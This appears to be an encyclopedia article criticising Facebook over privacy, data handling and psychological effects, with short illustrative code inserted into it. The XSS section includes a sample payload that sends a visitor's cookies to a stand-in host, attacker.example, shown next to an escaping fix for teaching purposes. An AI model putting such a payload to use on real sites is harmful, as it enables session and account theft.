Criticism of Facebook

Criticism of Facebook has led to international media coverage and significant reporting of its legal troubles and the outsize influence it has on the lives and health of its users and employees, as well as its influence on the way media, specifically news, is reported and distributed. Notable issues include Internet privacy, such as use of a widespread "like" button on third-party websites tracking users,[1][2] possible indefinite records of user information,[3] automatic facial recognition software,[4][5] and its role in the workplace, including employer-employee account disclosure.[6] The use of Facebook can have negative psychological effects that include feelings of jealousy[7][8] and stress,[9][10] a lack of attention,[11] and social media addiction that in some cases is comparable to drug addiction.[12][13]

Facebook's operations have also received critical coverage. The company's electricity usage,[14] tax avoidance,[15] real-name user requirement policies,[16] censorship policies,[17][18] handling of user data,[19] and its involvement in the United States PRISM surveillance program have been highlighted by the media and by critics.[20] Facebook has come under scrutiny for 'ignoring' or shirking its responsibility for the content posted on its platform, including copyright and intellectual property infringement,[21] hate speech,[22][23] incitement of rape[24] and terrorism,[25][26] fake news,[27][28][29] and Facebook murder, crimes, and violent incidents live-streamed through its Facebook Live functionality.[30][31][32]

The company and its employees have also been subject to litigation cases over the years,[33][34][35][36] with its most prominent case concerning allegations that CEO Mark Zuckerberg broke an oral contract with Cameron Winklevoss, Tyler Winklevoss, and Divya Narendra to build the then-named "HarvardConnection" social network in 2004, instead allegedly opting to steal the idea and code to launch Facebook months before HarvardConnection began.[37][38][39] The original lawsuit was eventually settled in 2009, with Facebook paying approximately $20 million in cash and 1.25 million shares.[40][41] A new lawsuit in 2011 was dismissed.[42] Some critics have predicted Facebook's decline or demise based on the problems they identify.

Several governments, including those of Syria,[43] China,[44] and Iran,[45] have banned Facebook for various reasons.

On August 13, 2019, it was revealed that the company had enlisted contractors to create and obtain transcripts of users' audio conversations.[46][47][48]

Privacy issues

Widening exposure of member information 2011–2012

In 2010, the Electronic Frontier Foundation identified two personal information aggregation techniques called "connections" and "instant personalization". They demonstrated that anyone could get access to information saved to a Facebook profile, even if the information was not intended to be made public.[49] A "connection" is created when a user clicks a "Like" button for a product or service, either on Facebook itself or an external site. Facebook treats such relationships as public information, and the user's identity may be displayed on the Facebook page of the product or service.[49]

Instant Personalization was a pilot program which shared Facebook account information with affiliated sites, such as sharing a user's list of "liked" bands with a music website, so that when the user visits the site, their preferred music plays automatically. The EFF noted that "For users that have not opted out, Instant Personalization is instant data leakage. As soon as you visit the sites in the pilot program (Yelp, Pandora, and Microsoft Docs) the sites can access your name, your picture, your gender, your current location, your list of friends, all the Pages you have Liked—everything Facebook classifies as public information. Even if you opt out of Instant Personalization, there's still data leakage if your friends use Instant Personalization websites—their activities can give away information about you, unless you block those applications individually."[49]

On December 27, 2012, CBS News reported that Randi Zuckerberg, sister of Facebook founder Mark Zuckerberg, criticized a friend for being "way uncool" in sharing a private Facebook photo of her on Twitter, only to be told that the image had appeared on a friend-of-a-friend's Facebook news feed. Commenting on this misunderstanding of Facebook's privacy settings, Eva Galperin of the EFF said "Even Randi Zuckerberg can get it wrong. That's an illustration of how confusing they can be."[50]

Issues during 2007

In August 2007, the code used to generate Facebook's home and search page as visitors browse the site was accidentally made public.[51][52] A configuration problem on a Facebook server caused the PHP code to be displayed instead of the web page the code should have created, raising concerns about how securely private data on the site was stored. A visitor to the site copied, published, and later removed the code from his web forum, claiming he had been served with a legal notice and threats by Facebook.[53] Facebook's response was quoted by the site that broke the story:[54]

A small fraction of the code that displays Facebook web pages was exposed to a small number of users due to a single misconfigured web server that was fixed immediately. It was not a security breach and did not compromise user data in any way. Because the code that was released powers only Facebook user interface, it offers no useful insight into the inner workings of Facebook. The reprinting of this code violates several laws and we ask that people not distribute it further.

In November, Facebook launched Beacon, a system (discontinued in September 2009)[55] where third-party websites could include a script by Facebook on their sites, and use it to send information about the actions of Facebook users on their site to Facebook, prompting serious privacy concerns. Information such as purchases made and games played was published in the user's news feed. An informative notice about this action appeared on the third-party site and allowed the user to cancel it, and the user could also cancel it on Facebook. Originally, if no action was taken, the information was automatically published. On November 29 this was changed to require confirmation from the user before publishing each story gathered by Beacon.

On December 1, Facebook's credibility in regard to the Beacon program was further tested when it was reported that The New York Times "essentially accuses" Mark Zuckerberg of lying to the paper and leaving Coca-Cola, which was reversing course on the program, with a similar impression.[56] A security engineer at CA, Inc. also claimed in a November 29, 2007, blog post that Facebook collected data from affiliate sites even when the consumer opted out and even when not logged into the Facebook site.[57] On November 30, 2007, the CA security blog posted a Facebook clarification statement addressing the use of data collected in the Beacon program:[58]

When a Facebook user takes a Beacon-enabled action on a participating site, information is sent to Facebook in order for Facebook to operate Beacon technologically. If a Facebook user clicks 'No, thanks' on the partner site notification, Facebook does not use the data and deletes it from its servers. Separately, before Facebook can determine whether the user is logged in, some data may be transferred from the participating site to Facebook. In those cases, Facebook does not associate the information with any individual user account, and deletes the data as well.

The Beacon service ended in September 2009 along with the settlement of a class-action lawsuit against Facebook resulting from the service.[55]

News Feed and Mini-Feed

On September 5, 2006, Facebook introduced two new features called "News Feed" and "Mini-Feed". The first of the new features, News Feed, appears on every Facebook member's home page, displaying recent Facebook activities of the member's friends. The second feature, Mini-Feed, keeps a log of similar events on each member's profile page.[59] Members can manually delete items from their Mini-Feeds if they wish to do so, and through privacy settings can control what is actually published in their respective Mini-Feeds.

Some Facebook members still feel that the ability to opt out of the entire News Feed and Mini-Feed system is necessary, as evidenced by a statement from the Students Against Facebook News Feed group, which peaked at over 740,000 members in 2006.[60] Reacting to users' concerns, Facebook developed new privacy features to give users some control over information about them that was broadcast by the News Feed.[61] According to subsequent news articles, members have widely regarded the additional privacy options as an acceptable compromise.[62]

In May 2010, Facebook added privacy controls and streamlined its privacy settings, giving users more ways to manage status updates and other information broadcast to the public News Feed.[63] Among the new privacy settings is the ability to control who sees each new status update a user posts: Everyone, Friends of Friends, or Friends Only. Users can now hide each status update from specific people as well.[64] However, a user who presses "like" or comments on the photo or status update of a friend cannot prevent that action from appearing in the news feeds of all the user's friends, even non-mutual ones. The "View As" option, used to show a user how privacy controls filter out what a specific friend can see, only displays the user's timeline and gives no indication that items missing from the timeline may still be showing up in the friend's own news feed.

Cooperation with government requests

Government and local authorities rely on Facebook and other social networks to investigate crimes and obtain evidence to help establish a crime, provide location information, establish motives, prove and disprove alibis, and reveal communications.[65] Federal, state, and local investigations have not been restricted to profiles that are publicly available or willingly provided to the government; Facebook has willingly provided information in response to government subpoenas or requests, except with regard to private, unopened inbox messages less than 181 days old, which require a warrant and a finding of probable cause under the federal Electronic Communications Privacy Act (ECPA). One 2011 article noted that "even when the government lacks reasonable suspicion of criminal activity and the user opts for the strictest privacy controls, Facebook users still cannot expect federal law to stop their 'private' content and communications from being used against them".[66]

Facebook's privacy policy states that "We may also share information when we have a good faith belief it is necessary to prevent fraud or other illegal activity, to prevent imminent bodily harm, or to protect ourselves and you from people violating our Statement of Rights and Responsibilities. This may include sharing information with other companies, lawyers, courts or other government entities".[66] Since the U.S. Congress has failed to meaningfully amend the ECPA to protect most communications on social-networking sites such as Facebook, and since the U.S. Supreme Court has largely refused to recognize a Fourth Amendment privacy right to information shared with a third party, no federal statutory or constitutional right prevents the government from issuing requests that amount to fishing expeditions, and Facebook's privacy policy does not forbid the company from handing over private user information that suggests illegal activity.[66]

The 2013 mass surveillance disclosures identified Facebook as a participant in the U.S. National Security Agency's PRISM program. Facebook now reports the number of requests it receives for user information from governments around the world.[67]

Complaint from CIPPIC

On May 31, 2008, the Canadian Internet Policy and Public Interest Clinic (CIPPIC), through its director Phillipa Lawson, filed a 35-page complaint with the Office of the Privacy Commissioner against Facebook, alleging 22 breaches of the Canadian Personal Information Protection and Electronic Documents Act (PIPEDA). University of Ottawa law students Lisa Feinberg, Harley Finkelstein, and Jordan Eric Plener initiated the "minefield of privacy invasion" suit. Facebook's Chris Kelly contradicted the claims, saying: "We've reviewed the complaint and found it has serious factual errors—most notably its neglect of the fact that almost all Facebook data is willingly shared by users."[68] Assistant Privacy Commissioner Elizabeth Denham released a report of her findings on July 16, 2009.[69] In it, she found that several of CIPPIC's complaints were well-founded. Facebook agreed to comply with some, but not all, of her recommendations.[69] The Assistant Commissioner found that Facebook did not do enough to ensure users granted meaningful consent for the disclosure of personal information to third parties and did not put adequate safeguards in place to prevent unauthorized access by third-party developers to personal information.[69]

Data mining

Concerns have been expressed regarding the use of Facebook as a means of surveillance and data mining.

Two Massachusetts Institute of Technology (MIT) students used an automated script to download the publicly posted information of over 70,000 Facebook profiles from four schools (MIT, NYU, the University of Oklahoma, and Harvard University) as part of a research project on Facebook privacy published on December 14, 2005.[70] Since then, Facebook has bolstered security protection for users, responding: "We've built numerous defenses to combat phishing and malware, including complex automated systems that work behind the scenes to detect and flag Facebook accounts that are likely to be compromised (based on anomalous activity like lots of messages sent in a short period of time, or messages with links that are known to be bad)."[71]

Another clause that drew criticism from some users gave Facebook the right to sell users' data to private companies, stating "We may share your information with third parties, including responsible companies with which we have a relationship." This concern was addressed by spokesman Chris Hughes, who said, "Simply put, we have never provided our users' information to third party companies, nor do we intend to."[72] Facebook eventually removed this clause from its privacy policy.[73]

In the United Kingdom, the Trades Union Congress (TUC) has encouraged employers to allow their staff to access Facebook and other social-networking sites from work, provided they proceed with caution.[74]

In September 2007, Facebook drew criticism after it began allowing search engines to index profile pages, though Facebook's privacy settings allow users to turn this off.[75]

Concerns were also raised on the BBC's Watchdog program in October 2007, when Facebook was shown to be an easy way to collect an individual's personal information to facilitate identity theft.[76] However, little personal information is presented to non-friends: if users leave the privacy controls on their default settings, the only personal information visible to a non-friend is the user's name, gender, profile picture and networks.[77]

An article in The New York Times in February 2008 pointed out that Facebook does not actually provide a mechanism for users to close their accounts, and raised the concern that private user data would remain indefinitely on Facebook's servers.[78] As of 2013, Facebook gives users the options to deactivate or delete their accounts. Deactivating an account allows it to be restored later, while deleting it will remove the account "permanently", although some data submitted by that account ("like posting to a group or sending someone a message") will remain.[79]

Onavo and Facebook Research

In 2013, Facebook acquired Onavo, a developer of mobile utility apps such as Onavo Protect VPN, which is used as part of an "Insights" platform to gauge the use and market share of apps.[80] This data has since been used to influence acquisitions and other business decisions regarding Facebook products.[81][82][83] Criticism of this practice emerged in 2018, when Facebook began to advertise the Onavo Protect VPN within its main app on iOS devices in the United States. Media outlets considered the app to effectively be spyware due to its behavior, adding that the app's listings did not readily disclose Facebook's ownership of the app or its data collection practices.[84][85] Facebook subsequently pulled the iOS version of the app, citing new iOS App Store policies forbidding apps from performing analytics on the usage of other apps on a user's device.[86][87][88]

Since 2016, Facebook has also run "Project Atlas"—publicly known as "Facebook Research"—a market research program inviting teenagers and young adults between the ages of 13 and 35 to have data such as their app usage, web browsing history, web search history, location history, personal messages, photos, videos, emails, and Amazon order history analyzed by Facebook. Participants would receive up to $20 per month for participating in the program. Facebook Research is administered by third-party beta testing services, including Applause, and requires users to install a Facebook root certificate on their phone. After a January 2019 report by TechCrunch on Project Atlas, which alleged that Facebook bypassed the App Store by using an Apple enterprise program intended for apps used internally by a company's employees, Facebook disputed the article but later announced its discontinuation of the program on iOS.[89][90]

On January 30, 2019, Apple temporarily revoked Facebook's Enterprise Developer Program certificates for one day, which caused all of the company's internal iOS apps to become inoperable.[91][92][93] Apple stated that "Facebook has been using their membership to distribute a data-collecting app to consumers, which is a clear breach of their agreement with Apple", and that the certificates were revoked "to protect our users and their data".[91] US Senators Mark Warner, Richard Blumenthal, and Ed Markey separately criticized Facebook Research's targeting of teenagers, and promised to sponsor legislation to regulate market research programs.[94][95]

Inability to voluntarily terminate accounts

Facebook had allowed users to deactivate their accounts but not actually remove account content from its servers. A Facebook representative explained to a student from the University of British Columbia that users had to clear their own accounts by manually deleting all of the content, including wall posts, friends, and groups. The New York Times noted the issue and raised a concern that emails and other private user data remained indefinitely on Facebook's servers.[78] Facebook subsequently began allowing users to permanently delete their accounts in 2010. Facebook's Privacy Policy now states, "When you delete an account, it is permanently deleted from Facebook."[73]

Memorials

A notable ancillary effect of social-networking websites is the ability for participants to mourn publicly for a deceased individual. On Facebook, friends often leave messages of sadness, grief, or hope on the individual's page, transforming it into a public book of condolences. This particular phenomenon has been documented at a number of schools.[96][97][98] Facebook originally held a policy that profiles of people known to be deceased would be removed after 30 days due to privacy concerns.[99] Due to user response, Facebook changed its policy to place deceased members' profiles in a "memorialization state".[100] Facebook's Privacy Policy regarding memorialization says, "If we are notified that a user is deceased, we may memorialize the user's account. In such cases we restrict profile access to confirmed friends and allow friends and family to write on the user's Wall in remembrance. We may close an account if we receive a formal request from the user's next of kin or other proper legal request to do so."[73]

Some of these memorial groups have also caused legal issues. Notably, on January 1, 2008, one such memorial group posted the identity of murdered Toronto teenager Stefanie Rengel, whose family had not yet given the Toronto Police Service their consent to release her name to the media, and the identities of her accused killers, in defiance of Canada's Youth Criminal Justice Act, which prohibits publishing the names of the under-age accused.[101] While police and Facebook staff attempted to comply with the privacy regulations by deleting such posts, they noted difficulty in effectively policing the individual users who repeatedly republished the deleted information.[102]

Customization and security

In July 2007, Adrienne Felt, an undergraduate student at the University of Virginia, discovered a cross-site scripting (XSS) hole in the Facebook Platform that could inject JavaScript into profiles. She used the hole to import custom CSS and demonstrate how the platform could be used to violate privacy rules or create a worm.[103]
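Cross-site scripting vulnerabilities of this kind arise when user-supplied content is rendered into a page without escaping. The following minimal Python sketch illustrates the general pattern; it is hypothetical and does not reflect the actual Facebook Platform code.

```python
import html

def render_profile_unsafe(about_me: str) -> str:
    # Vulnerable: user input is interpolated directly into the page, so a
    # submitted "<script>...</script>" block will execute in visitors' browsers.
    return f"<div class='about'>{about_me}</div>"

def render_profile_safe(about_me: str) -> str:
    # Escaping converts markup characters into entities, neutralizing injected script.
    return f"<div class='about'>{html.escape(about_me)}</div>"

payload = "<script>new Image().src='https://attacker.example/?c='+document.cookie</script>"
print(render_profile_unsafe(payload))  # the script tag survives intact
print(render_profile_safe(payload))    # rendered as inert text
```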

Quit Facebook Day

Quit Facebook Day was an online event which took place on May 31, 2010 (coinciding with Memorial Day), in which Facebook users stated that they would quit the social network due to privacy concerns.[104] It was estimated that 2% of Facebook users coming from the United States would delete their accounts.[105] However, only about 33,000 users (roughly 0.0066% of its roughly 500 million members at the time) quit the site.[106] The number one reason for users to quit Facebook was privacy concerns (48%), followed by general dissatisfaction with Facebook (14%), negative aspects regarding Facebook friends (13%), and the feeling of being addicted to Facebook (6%). Facebook quitters were found to be more concerned about privacy, more addicted to the Internet, and more conscientious.[107]

Photo recognition and face tagging

Facebook enabled an automatic facial recognition feature in June 2011, called "Tag Suggestions", a product of a research project named "DeepFace".[108] The feature compares newly uploaded photographs to those of the uploader's Facebook friends, to suggest photo tags.

National Journal Daily claimed that "Facebook is facing new scrutiny over its decision to automatically turn on a new facial recognition feature aimed at helping users identify their friends in photos".[109] Facebook has defended the feature, saying users can disable it.[110] Facebook introduced the feature on an opt-out basis.[111] European Union data-protection regulators said they would investigate the feature to see if it violated privacy rules.[110][112] Naomi Lachance stated in a web blog for NPR, All Tech Considered, that Facebook's facial recognition is right 98% of the time, compared to the FBI's 85% out of 50 people. However, the accuracy of Facebook searches is due to its larger, more diverse photo selection compared to the FBI's closed database.[113] Mark Zuckerberg expressed no concerns when speaking about Facebook's AIs, saying, "Unsupervised learning is a long-term focus of our AI research team at Facebook, and it remains an important challenge for the whole AI research community" and "It will save lives by diagnosing diseases and driving us around more safely. It will enable breakthroughs by helping us find new planets and understand Earth's climate. It will help in areas we haven't even thought of today".[114]

Investigation by the Irish Data Protection Commissioner, 2011–2012

In August 2011, the Irish Data Protection Commissioner (DPC) started an investigation after receiving 22 complaints from europe-v-facebook.org, which was founded by a group of Austrian students.[115] The DPC stated in its initial reaction that it is legally responsible for privacy on Facebook for all users within the European Union[116] and that the Commissioner would "investigate the complaints using his full legal powers if necessary".[117] The complaints were filed in Ireland because all users who are not residents of the United States or Canada have a contract with "Facebook Ireland Ltd", located in Dublin, Ireland. Under European law Facebook Ireland is the "data controller" for facebook.com, and therefore facebook.com is governed by European data protection laws.[116] Facebook Ireland Ltd. was established by Facebook Inc. to avoid US taxes (see Double Irish arrangement).[118]

The group europe-v-facebook.org made access requests to Facebook Ireland and received up to 1,222 pages of data per person, covering 57 data categories that Facebook was holding about them,[119] including data that the users had previously removed.[120] The group claimed that Facebook failed to provide some of the requested data, including "likes", facial recognition data, data about third-party websites that use "social plugins" visited by users, and information about uploaded videos. The group now claims that Facebook holds at least 84 data categories about every user.[121]

The first 16 complaints targeted various problems, from undeleted old "pokes" to the question of whether sharing and new functions on Facebook should be opt-in or opt-out.[122] A second wave of six further complaints targeted additional issues, including one against the "Like" button.[123] The most serious may be a complaint claiming that the privacy policy, and users' consent to it, are void under European law.

In an interview with the Irish Independent, a spokesperson said that the DPC would "go and audit Facebook, go into the premises and go through in great detail every aspect of security". He continued: "It's a very significant, detailed and intense undertaking that will stretch over four or five days." In December 2011, the DPC published its first report on Facebook. This report was not legally binding but suggested changes that Facebook should undertake by July 2012. The DPC planned to review Facebook's progress in July 2012.

Changes

In spring 2012, Facebook had to undertake many changes, such as an extended download tool meant to allow users to exercise the European right of access to all stored information, and an update of the worldwide privacy policy. Europe-v-facebook.org considered these changes insufficient to comply with European law; the download tool, for example, did not give access to all data. The group launched our-policy.org[124] to suggest improvements to the new policy, which it saw as a setback for privacy on Facebook. Because the group managed to gather more than 7,000 comments on Facebook's pages, Facebook had to hold a worldwide vote on the proposed changes. Such a vote would only have been binding if 30% of all users had taken part. Facebook did not promote the vote, resulting in only 0.038% participation, with about 87% voting against Facebook's new policy. The new privacy policy took effect on the same day.[125]

Tracking of non-members of Facebook

An article published by USA Today in November 2011 claimed that Facebook creates logs of pages visited both by its members and by non-members, relying on tracking cookies to keep track of pages visited.[126]

In early November 2015, Facebook was ordered by the Belgian Privacy Commissioner to cease tracking non-users, citing European laws, or risk fines of up to £250,000 per day.[127] As a result, instead of removing tracking cookies, Facebook banned non-users in Belgium from seeing any material on Facebook, including publicly posted content, unless they sign in. Facebook criticized the ruling, saying that the cookies provided better security.[128][129]

Stalking

According to statistics, 63% of Facebook profiles are set to be "visible to the public" by default, meaning anyone can access the profiles that users have updated. Facebook also has its own built-in messaging system through which people can send messages to any other user, unless the recipient has restricted messages to friends only. Stalking is not limited to the social network itself but can lead to further "in-person" stalking, because nearly 25% of real-life stalking victims reported that it started with online instant messaging (e.g., Facebook chat).[130][131]

Performative surveillance

Performative surveillance is the notion that people are very much aware that they are being surveilled on websites like Facebook, and use the surveillance as an opportunity to portray themselves in a way that connotes a certain lifestyle, which may or may not match how that individual lives in reality.[132]

2010 application privacy breach

In 2010, the Wall Street Journal found that many of Facebook's top-rated apps—including apps from Zynga and Lolapps—were transmitting identifying information to "dozens of advertising and Internet tracking companies" like RapLeaf. The apps used an HTTP referer that exposed the user's identity and sometimes their friends' identities. Facebook said that "While knowledge of user ID does not permit access to anyone’s private information on Facebook, we plan to introduce new technical systems that will dramatically limit the sharing of User ID’s". A blog post by a member of Facebook's team further stated that "press reports have exaggerated the implications of sharing a user ID", though still acknowledging that some of the apps were passing the ID in a manner that violated Facebook's policies.[133][134]
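The mechanism behind this kind of leak is mundane: if a page's URL contains the viewer's user ID, any third-party resource loaded from that page can read the ID from the HTTP Referer header. The following Python sketch shows what a tracker-side log parser could do; the parameter name and URLs are illustrative assumptions, not Facebook's actual endpoints.

```python
from typing import Optional
from urllib.parse import parse_qs, urlparse

def extract_user_id(referer: str) -> Optional[str]:
    """Pull a user-ID-style query parameter out of a Referer header, if present."""
    query = parse_qs(urlparse(referer).query)
    ids = query.get("fb_user_id")  # hypothetical parameter name, for illustration
    return ids[0] if ids else None

# A third-party ad request whose Referer still carries the app's page URL.
referer = "https://apps.example.com/some-game/?fb_user_id=100000123456789&level=12"
print(extract_user_id(referer))  # -> 100000123456789
```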

Facebook and Cambridge Analytica data scandal

In 2018, Facebook admitted[135][136] that an app made by Global Science Research and Alexandr Kogan, related to Cambridge Analytica, was able in 2014[137] to harvest personal data of up to 87 million Facebook users without their consent, by exploiting their friendship connection to the users who sold their data via the app.[138] Following the revelations of the breach, several public figures, including industrialist Elon Musk and WhatsApp cofounder Brian Acton, announced that they were deleting their Facebook accounts, using the hashtag "#deletefacebook".[139][140][141]

Facebook was also criticized for allowing the 2012 Barack Obama presidential campaign to analyze and target select users by providing the campaign with friendship connections of users who signed up for an application. However, users signing up for the application were aware that their data, but not the data of their friends, was going to a political party.[142][143][144][145][146]

Employer-employee privacy issues

In an effort to surveil the personal lives of current or prospective employees, some employers have asked employees to disclose their Facebook login information. This has resulted in the passing of a bill in New Jersey making it illegal for employers to ask potential or current employees for access to their Facebook accounts.[147] Although the U.S. government has yet to pass a national law protecting prospective employees' social networking accounts from employers, the Fourth Amendment of the U.S. Constitution can protect prospective employees in specific situations.[148][149] Many companies review the Facebook profiles of job candidates, looking for reasons not to hire them. According to a survey of hiring managers by CareerBuilder.com, the most common deal breakers they found on Facebook profiles include references to drinking, poor communication skills, inappropriate photos, and lying about skills and/or qualifications.[150]

Facebook requires its employees and contractors to give it permission to access their personal profiles, including friend requests and personal messages.

Users violating minimum age requirements

A 2011 study in the online journal First Monday examines how parents consistently enable children as young as 10 years old to sign up for accounts, directly violating Facebook's policy banning young visitors. This policy is in compliance with a United States law, the 1998 Children's Online Privacy Protection Act, which requires minors aged under 13 to gain explicit parental consent to access commercial websites. In jurisdictions where a similar law sets a lower minimum age, Facebook enforces the lower age. Of the 1,007 households surveyed for the study, 76% of parents reported that their child joined Facebook at an age younger than 13, the minimum age in the site's terms of service. The study also reported that Facebook removes roughly 20,000 users each day for violating its minimum age policy. The study's authors also note, "Indeed, Facebook takes various measures both to restrict access to children and delete their accounts if they join." The findings of the study raise questions primarily about the shortcomings of United States federal law, but also implicitly continue to raise questions about whether or not Facebook does enough to publicize its terms of service with respect to minors. Only 53% of parents said they were aware that Facebook has a minimum signup age; 35% of these parents believe that the minimum age is merely a recommendation or thought the signup age was 16 or 18, not 13.[151]

Student privacy concerns

Students who post illegal or otherwise inappropriate material have faced disciplinary action from their universities, colleges, and schools, including expulsion.[152] Others who posted libelous content relating to faculty have also faced disciplinary action.[153] The Journal of Education for Business states that "a recent study of 200 Facebook profiles found that 42% had comments regarding alcohol, 53% had photos involving alcohol use, 20% had comments regarding sexual activities, 25% had seminude or sexually provocative photos, and 50% included the use of profanity."[154] It is inferred that negative or incriminating Facebook posts can affect how alumni and potential employers perceive students. This perception can greatly affect students' relationships, their ability to gain employment, and their ability to maintain school enrollment. The desire for social acceptance leads individuals to share the most intimate details of their personal lives, along with illicit drug use and binge drinking. Too often, these portrayals of their daily lives are exaggerated and/or embellished to attract like-minded others.[154]

Effect on higher education

On January 23, 2006, The Chronicle of Higher Education continued an ongoing national debate on social networks with an opinion piece written by Michael Bugeja, director of the Journalism School at Iowa State University, entitled "Facing the Facebook".[155] Bugeja, author of the Oxford University Press text Interpersonal Divide (2005), quoted representatives of the American Association of University Professors and colleagues in higher education to document the distraction of students using Facebook and other social networks during class and at other venues in the wireless campus. Bugeja followed up on January 26, 2007 in The Chronicle with an article titled "Distractions in the Wireless Classroom",[156] quoting several educators across the country who were banning laptops in the classroom. Similarly, organizations such as the National Association for Campus Activities,[157] the Association for Education in Journalism and Mass Communication,[158] and others have hosted seminars and presentations to discuss ramifications of students' use of Facebook and other social-networking sites.

The EDUCAUSE Learning Initiative has also released a brief pamphlet entitled "7 Things You Should Know About Facebook" aimed at higher education professionals that "describes what [Facebook] is, where it is going, and why it matters to teaching and learning".[159]

Some research[160][161][162] on Facebook in higher education suggests that there may be small educational benefits associated with student Facebook use, including improving engagement, which is related to student retention.[162] A 2012 study found that time spent on Facebook is related to involvement in campus activities.[161] The same study found that certain Facebook activities, like commenting and creating or RSVPing to events, were positively related to student engagement, while playing games and checking up on friends were negatively related. Furthermore, using technologies such as Facebook to connect with others can help college students be less depressed and cope with feelings of loneliness and homesickness.[163]

Effect on college student grades

As of February 2012, only four published peer-reviewed studies have examined the relationship between Facebook use and grades.[160][164][165][166] The findings vary considerably. Pasek et al. (2009)[166] found no relationship between Facebook use and grades. Kolek and Saunders (2008)[165] found no differences in overall grade point average (GPA) between users and non-users of Facebook. Kirschner and Karpinski (2010)[164] found that Facebook users reported a lower mean GPA than non-users. Junco's (2012)[160] study clarifies the discrepancies in these findings. While Junco (2012)[160] found a negative relationship between time spent on Facebook and student GPA in his large sample of college students, the real-world impact of the relationship was negligible. Furthermore, Junco (2012)[160] found that sharing links and checking up on friends were positively related to GPA while posting status updates was negatively related. In addition to noting the differences in how Facebook use was measured among the four studies, Junco (2012)[160] concludes that the ways in which students use Facebook are more important in predicting academic outcomes.

Phishing

Phishing refers to a scam used by criminals to trick people into revealing passwords, credit card information, and other sensitive information. On Facebook, phishing attempts occur through messages or wall posts from a friend's account that has been breached. If the user takes the bait, the phishers gain access to the user's Facebook account and send phishing messages to the user's other friends. The point of the post is to get users to visit a website containing viruses and malware.[150]

Unpublished photo disclosure bug

In September 2018, a software bug meant that photos that had been uploaded to Facebook accounts, but that had not been "published" (and which therefore should have remained private between the user and Facebook), were exposed to app developers.[167] Approximately 6.8 million users and 1,500 third-party apps were affected.[167]

In December 2018, it emerged that Facebook had, during the period 2010–2018, granted access to users' private messages, address book contents, and private posts, without the users' consent, to more than 150 third parties including Microsoft, Amazon, Yahoo, Netflix, and Spotify. This had been occurring despite public statements from Facebook that it had stopped such sharing years earlier.[168]

Denial of location privacy, regardless of user settings

In December 2018, it emerged that Facebook's mobile app reveals the user's location to Facebook, even if the user does not use the "check in" feature and has configured all relevant settings within the app so as to maximize location privacy.[169]

E-commerce and drop shipping scams

In April 2016, Buzzfeed published an article exposing drop shippers who were using Facebook and Instagram to swindle unsuspecting customers. Located mostly in China, these drop shippers and e-commerce sites would steal copyrighted images from larger retailers and influencers to gain credibility. After luring a customer with a low price for the item, they would then deliver a product that was nothing like what was advertised, or no product at all.[170]

In February 2019, it emerged that a number of Facebook apps, including Flo, had been sending users' health data such as blood pressure and ovulation status to Facebook without users' informed consent.[171][172][173][174] New York governor Andrew Cuomo called the practice an "outrageous abuse of privacy", ordered New York's department of state and department of financial services to investigate, and encouraged federal regulators to step in.[175]

International lobbying against privacy protections

In early 2019, it was reported that Facebook had spent years lobbying extensively against privacy protection laws around the world, such as the General Data Protection Regulation (GDPR).[176][177]

The lobbying included efforts by Sandberg to "bond" with female European officials including Enda Kenny (then Prime Minister of Ireland, where Facebook's European operations are based), to influence them in Facebook's favor.[176] Other politicians reportedly lobbied by Facebook in relation to privacy protection laws included George Osborne (then Chancellor of the Exchequer), Pranab Mukherjee (then President of India), and Michel Barnier.[176]

Unencrypted password storage

In March 2019, Facebook admitted that it had mistakenly stored "hundreds of millions" of passwords of Facebook and Instagram users in plaintext (as opposed to being hashed and salted) on multiple internal systems accessible only to Facebook engineers, dating as far back as 2012. Facebook stated that affected users would be notified, but that there was no evidence that this data had been abused or leaked.[178][179]

In April 2019, Facebook admitted that its subsidiary Instagram also stored millions of unencrypted passwords.[180]
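By contrast, the "hashed and salted" storage that these reports refer to derives a non-reversible digest from each password using a random per-user salt, so that neither engineers nor attackers who obtain the stored values can read the original passwords. The following is a minimal Python sketch of that general approach, for illustration only; it does not describe Facebook's or Instagram's internal systems.

```python
import hashlib
import hmac
import os

def hash_password(password: str) -> tuple:
    """Return a (salt, digest) pair using PBKDF2-HMAC-SHA256 with a random per-user salt."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)
    return salt, digest

def verify_password(password: str, salt: bytes, expected: bytes) -> bool:
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)
    return hmac.compare_digest(digest, expected)  # constant-time comparison

salt, stored = hash_password("correct horse battery staple")
print(verify_password("correct horse battery staple", salt, stored))  # True
print(verify_password("wrong guess", salt, stored))                   # False
```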

Promotion of service as "free"

In December 2019, the Hungarian Competition Authority fined Facebook around US$4 million for false advertising, ruling that Facebook cannot market itself as a "free" (no cost) service because the use of detailed personal information to deliver targeted advertising constituted a compensation that must be provided to Facebook to use the service.[181]

Providing ads through "snooping"

There has been controversy over whether Facebook spies on people by listening to their conversations. "Facebook is eavesdropping on you," says Jamie Court, the president of the Los Angeles-based nonprofit Consumer Watchdog. "It's just in a different way." Facebook tracks users in ways many do not realize and is so effective at it that many assume it must be monitoring their conversations, when instead it uses sophisticated demographic and location data to serve up ads.[182] This has led to recurring fears among users of being watched or listened to. Facebook has for years denied that it listens to conversations and then serves ads based on them. In mid-2016, Facebook stated: "Facebook does not use your phone's microphone to inform ads or to change what you see in News Feed. Some recent articles have suggested that we must be listening to people's conversations in order to show them relevant ads. This is not true. We show ads based on people's interests and other profile information, not what you're talking out loud about."[183]

Psychological/sociological effects

Facebook addiction

The "World Unplugged" study, which was conducted in 2011, claims that for some users quitting social networking sites is comparable to quitting smoking or giving up alcohol.[184] Another study conducted in 2012 by researchers from the University of Chicago Booth School of Business in the United States found that drugs like alcohol and tobacco could not keep up with social networking sites regarding their level of addictiveness.[185] A 2013 study in the journal CyberPsychology, Behavior, and Social Networking found that some users decided to quit social networking sites because they felt they were addicted. In 2014, the site went down for about 30 minutes, prompting several users to call emergency services.[186]

In April 2015, the Pew Research Center published a survey of 1,060 U.S. teenagers ages 13 to 17, in which nearly three-quarters reported that they either owned or had access to a smartphone, 92 percent went online daily, and 24 percent said they went online "almost constantly."[187] In March 2016, Frontiers in Psychology published a survey of 457 post-secondary student Facebook users (following a face validity pilot of another 47 post-secondary student Facebook users) at a large university in North America showing that the severity of ADHD symptoms had a statistically significant positive correlation with Facebook usage while driving a motor vehicle, and that impulses to use Facebook while driving were stronger among male users than female users.[188]

